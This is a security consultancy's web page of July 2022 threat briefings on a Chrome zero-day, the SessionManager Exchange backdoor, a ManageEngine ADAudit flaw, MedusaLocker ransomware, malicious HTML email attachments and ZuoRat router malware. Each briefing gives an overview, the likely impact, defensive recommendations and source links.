Get Help Now
CONTACT US

Get expert threat analysis weekly. Sign up to receive our Threat Briefing:

    RESOURCES  >   THREAT INTEL BRIEFINGS

    Date: 7/5/2022

    Google Chrome Zero-Day

    Overview

    Google Chrome is affected by a zero-day vulnerability that is being exploited in the wild. The vulnerability is tracked as CVE-2022-2294 and relates to a heap overflow flaw in a component that provides real-time audio and video communication capabilities. 

    Potential Impact

    Heap buffer overflow vulnerabilities can lead to an attacker executing arbitrary code and potentially evading active security defenses. This vulnerability also impacts the Android version of Chrome. 

    Recommended Actions

    Users should update Chrome to version 103.0.5060 for Windows, macOS, and Linux. To install Chrome updates, click the three dots in the upper right side of Chrome, select Settings, and then click “About Chrome.” Android users should update to version 103.0.5060.71.

    Request Consultation

    For more information, fill out the form below and we will be in touch shortly

      SessionManager Backdoor

      Overview

      Newly discovered malware has been in the wild since March 2021 and is used for backdoor Internet-facing Microsoft Exchange servers. The malware disguises itself as a module for Internet Information Services (“IIS”) and has been deployed after exploiting past ProxyLogon flaws within Exchange. This malware has been dubbed SessionManager. 

      Potential Impact

      IIS modules as backdoors allow malicious actors to maintain persistence stealth and perform a wide range of actions such as collecting emails or launching further attacks inside a victim’s network. Attackers have used this backdoor access to deploy reconnaissance and credential harvesting tools. 

      Recommended Actions

      Organizations should primarily ensure that Internet-facing Microsoft Exchange servers are up to date. It is strongly recommended that these systems be protected by Endpoint Detection & Response (“EDR”) tools with strong monitoring capabilities. Administrators should also consider disabling public access to the Exchange Control Panel (“ECP”) and the Offline Address Book (“OAB”). 

      Sources

      https://thehackernews.com/2022/07/new-sessionmanager-backdoor-targeting.html
      https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/

      ManageEngine ADAudit Exploit

      Overview

      Researchers have published technical details for CVE-2022-28219, a critical vulnerability in the Zoho ManageEngine ADAudit Plus tool for monitoring activities in Active Directory. The vulnerability allows for unauthenticated remote code execution. However, an attacker would need to require access to the internal network before exploitation unless ADAudit Plus services are accessible from the Internet. 

      Potential Impact

      Exploitation permits attackers to execute arbitrary code, upload files, steal account credentials, and potentially leverage ADAudit Plus functionality to deploy malware on all Active Directory managed systems. 

      Recommended Actions

      Ensure that ADAudit Plus instances are running build 7060. Administrators should also ensure access to ADAudit Plus is restricted and leverage separate service accounts with limited privileges. 

      Sources
      https://www.bleepingcomputer.com/news/security/zoho-manageengine-adaudit-plus-bug-gets-public-rce-exploit/

      MedusaLocker Ransomware Attack Increase

      Overview

      The FBI, CISA, and FinCEN have issued joint advisories highlighting a recent increase in MedusaLocker ransomware attacks. These new attacks are attributed explicitly to Remote Desktop Protocol (RDP) access to the victim network. Post-exploitation activities include the detonation of MedusaLocker and the creation of ransom notes pointing to various Bitcoin wallet addresses.

      Most attacks have seen an initial compromise via phishing emails that include RDP exploits. Secondary actions include utilizing PowerShell scripts to propagate the ransomware throughout the network. The attacks have also been killing the primary process of any well-known security and forensic software to maintain persistence. The final activity in the kill-chain is the deployment of AES-256 and RSA-2048 algorithms to mass encrypt files and folders. 

      Potential Impact

      MedusaLocker is an incredibly successful ransomware variant with a large attack surface since 2019. Combining their sophisticated kill chains with well-established encryption standards, these attacks can have a massive impact on victim networks. Organizations should be on the lookout for these attacks and take appropriate actions. 

      Recommended Actions

      First and foremost, organizations should be utilizing strong email security and Endpoint Detection and Response products. This will significantly impact the attack surface of the MedusaLocker’s initial access point, most commonly phishing. 

      Additionally, organizations should have tested and up-to-date recovery plans if a ransomware attack is successful. This should include the ability to retain and restore sensitive or proprietary data through backups and copies of critical data. 

      Implementing network segmentation and maintaining offline backups of data should also be advised.

      Sources
      https://thehackernews.com/2022/03/emotet-botnets-latest-resurgence.html
      https://thehackernews.com/2022/02/reborn-of-emotet-new-features-of-botnet.htmlFor More Information

      HTML Attachment Advisory

      Overview

      Researchers at Barracuda Networks have published an alarming statistic that one in five HTML email attachments contain malicious logic. 

      This statistic was found after the Barracuda team analyzed millions of attachments that passed Barracuda systems over a multi-month period. Each of these attachments was scanned and compared to similar attachments. Of these millions of attachments, 21% of all HTML attachments were found malicious.

      Barracuda reported that attackers had embedded HTML attachments in emails disguised as weekly reports. This tricks users into clicking on phishing links.

      Potential Impact

      The Barracuda team has observed attackers using these HTML attachments for multiple attacks. The method is for credential phishing; attackers include links to phishing sites within the HTML that, when opened, use Javascript to redirect to a third-party machine and request credentials. Similarly, attacks will consist of links that attempt to download malware directly onto user machines. Past that, some attachments don’t even forward users to fake websites. Instead, they create phishing forms directly embedded in the attachments, sending the phishing sites as attachments instead of redirecting links.

      Recommended Actions

      Organizations can strengthen their security against malicious HTML attachments in a few ways. First, organizations should ensure that their deployed email security product(s) is/are configured to scan and block malicious email attachments, especially HTML documents. Barracuda specifically recommends solutions that include machine learning and static code analysis to evaluate an email’s content, not just the attachment(s). 

      Secondly, training users to identify and report malicious attachments is essential. This can significantly reduce the chances of users falling victim to these phishing attacks.

      Lastly, if an attack is successful, having robust Endpoint Detection and Response capabilities is key to protecting potentially compromised endpoints.

      Sources
      https://blog.barracuda.com/2022/06/28/threat-spotlight-malicious-html-attachments/

      ZuoRat Router Malware Campaign Exhibits Dangerous Capabilities and Behavior

      Overview

      Lumen Technologies “Black Lotus Labs” division published a report about a router malware campaign. 

      The campaign targets “more than eighty SOHO router models, including ones from Asus, Cisco, DrayTek, and Netgear.” 

      Black Lotus Labs has observed the malware capturing network traffic, scanning home networks, and infecting hosts on victim networks with command and control infrastructure such as Cobalt Strike. 

      The sophistication level of the malware suggests that a nation-state threat actor might be behind the campaign.

      Potential Impact

      The report did not include information regarding suspected end-goals of attackers, but considering the observed activity, the potential is limitless. The campaign infects SOHO (Small-Office/Home-Office) routers, which is a willful blind spot for those managing corporate technology in the “Work From Anywhere” (WFA) environment that most of us find ourselves. Understandably, these technology managers must draw a line regarding what they manage. This demarcation point is often the management of users’ home networks. In the WFA environment, an infected home network can have the same impact as an infected corporate network. This can range from espionage to exfiltration to ransomware.

      Recommended Actions

      The most secure end of the WFA spectrum includes corporations supplying and managing Internet connections and networking equipment for all employees. Because employee home networks are primarily out of control of most corporate IT departments, a meticulous focus on IT asset configuration management and Endpoint Detection and Response (EDR) configuration is helpful in the WFA environment. Corporations leveraging the WFA model should, at the very least, include language in policies requiring employees to maintain home network equipment at the highest available patch level.  

      Sources
      https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/?utm_source=referral&utm_medium=press+release
      https://www.wired.com/story/zuorat-trojan-malware-hacking-routers/

      For strategic clients, your vCISO will add this to your next Office Hours for further discussion. However, if you have an immediate need, concern, or question, please reach out to them directly.

      For non-strategic clients, please reach out to your Advisor for further discussion.

      For those not yet clients of GreyCastle Security, please click the “Contact Us” button below and we’ll be glad to provide assistance as well as answer any questions you might have.


      Let’s Discuss Your Cybersecurity Needs

      Privacy Settings
      We use cookies to enhance your experience while using our website. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. We also use content and scripts from third parties that may use tracking technologies. You can selectively provide your consent below to allow such third party embeds. For complete information about the cookies we use, data we collect and how we process them, please check our Privacy Policy
      Youtube
      Consent to display content from Youtube
      Vimeo
      Consent to display content from Vimeo
      Google Maps
      Consent to display content from Google
      Spotify
      Consent to display content from Spotify
      Sound Cloud
      Consent to display content from Sound
      Contact Us